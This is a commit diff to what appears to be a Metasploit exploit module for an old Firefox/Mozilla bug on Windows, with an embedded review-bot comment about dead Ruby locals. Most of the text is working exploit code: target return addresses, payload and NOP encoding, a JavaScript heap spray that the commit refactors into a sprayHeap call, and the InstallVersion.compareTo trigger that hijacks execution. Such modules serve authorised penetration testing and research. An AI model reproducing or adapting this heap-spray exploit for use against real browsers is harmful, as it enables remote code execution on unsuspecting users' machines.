fixes 688. better return address for greater reliability, works against FF-1.0.4 and Moz-1.7.1 on XPSP3 and 2kAS-SP0
git-svn-id: file:///home/svn/framework3/trunk@7865 4d416f70-5f16-0410-b530-b9f4589650da
parent
c799df8559
commit
0cf566c0b9
@ -57,16 +57,17 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Targets' =>
[
[ 'Firefox < 1.0.5 Windows',
# Tested against Firefox 1.0.4 and Mozilla 1.7.1 on
# WinXP-SP3 and Win2kAS-SP0
[ 'Firefox < 1.0.5, Mozilla < 1.7.10, Windows',
{
'Platform' => 'win',
'Arch' => ARCH_X86,
'StackAdjustment' => -3500,
'Addrs' => [ 0x12000000, 0x11C0002C, 0x1200002C, 0x1180002C ],
|
'Ret' => 0x0c0c0c0c,
}
],
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jul 13 2005'
))
end
|
@ -88,10 +89,10 @@ class Metasploit3 < Msf::Exploit::Remote
enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))
|
spray_to = sprintf("0x%.8x", target['Addrs'][0])
spray_slide1 = Rex::Text.to_unescape( [target['Addrs'][1]].pack('V'), Rex::Arch.endian(target.arch) )
spray_slide2 = Rex::Text.to_unescape( [target['Addrs'][2]].pack('V'), Rex::Arch.endian(target.arch) )
eax_address = sprintf("0x%.8x", target['Addrs'][3])
spray_to = sprintf("0x%.8x", target.ret)
spray_slide1 = Rex::Text.to_unescape( [target.ret].pack('V'), Rex::Arch.endian(target.arch) )
spray_slide2 = Rex::Text.to_unescape( [target.ret].pack('V'), Rex::Arch.endian(target.arch) )
eax_address = sprintf("0x%.8x", target.ret)
|
return %Q|
<html>
|
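Review bot: The four rebuilt locals at `spray_to`, `spray_slide1`, `spray_slide2` and `eax_address` all derive from the same `target.ret`, and `spray_slide1`/`spray_slide2` are now byte-identical; judging by the third hunk, the JavaScript `spraySlide1`/`spraySlide2` block that interpolated them is replaced by a single `sprayHeap(...)` call, which would leave both Ruby locals unused. If the template no longer references `#{spray_slide1}` or `#{spray_slide2}`, drop those two assignments rather than keeping dead computation in the request handler. `spray_to` and `eax_address` hold the same formatted string and could share one local, e.g. `ret_hex = sprintf("0x%.8x", target.ret)`. The enclosing method starts and ends outside the hunk, so the remaining uses should be confirmed against the full method body.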
@ -110,45 +111,16 @@ class Metasploit3 < Msf::Exploit::Remote
CrashAndBurn();
};
|
#{js_heap_spray}
// The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology
function CrashAndBurn()
{
// Spray up to this address
var heapSprayToAddress=#{spray_to};
|
// Payload - Just return..
var payLoadCode=unescape("#{enc_code}");
|
// Size of the heap blocks
var heapBlockSize=0x400000;
|
// Size of the payload in bytes
var payLoadSize=payLoadCode.length * 2;
|
// Caluclate spray slides size
var spraySlideSize=heapBlockSize-(payLoadSize+0x38); // exclude header
|
// Set first spray slide ("pdata") with "pvtbl" fake address - 0x11C0002C
var spraySlide1 = unescape("#{spray_slide1}");
|
spraySlide1 = getSpraySlide(spraySlide1,spraySlideSize);
|
var spraySlide2 = unescape("#{spray_slide2}"); //0x1200002C
|
spraySlide2 = getSpraySlide(spraySlide2,spraySlideSize);
|
var spraySlide3 = unescape("#{enc_nops}");
spraySlide3 = getSpraySlide(spraySlide3,spraySlideSize);
|
// Spray the heap
heapBlocks=(heapSprayToAddress-0x400000)/heapBlockSize;
//alert(spraySlide2.length); return;
memory = new Array();
for (i=0;i<heapBlocks;i++)
{
memory[i]=(i\%3==0) ? spraySlide1 + payLoadCode:
(i\%3==1) ? spraySlide2 + payLoadCode: spraySlide3 + payLoadCode;
}
sprayHeap(payLoadCode, #{target.ret}, heapBlockSize - (payLoadCode.length + 0x38));
|
// Set address to fake "pdata".
var eaxAddress = #{eax_address};
|
@ -162,16 +134,6 @@ class Metasploit3 < Msf::Exploit::Remote
//
(new InstallVersion).compareTo(new Number(eaxAddress >> 1));
}
|
function getSpraySlide(spraySlide, spraySlideSize) {
while (spraySlide.length*2<spraySlideSize)
{
spraySlide+=spraySlide;
}
spraySlide=spraySlide.substring(0,spraySlideSize/2);
return spraySlide;
}
|
// -->
</script>
</head>
|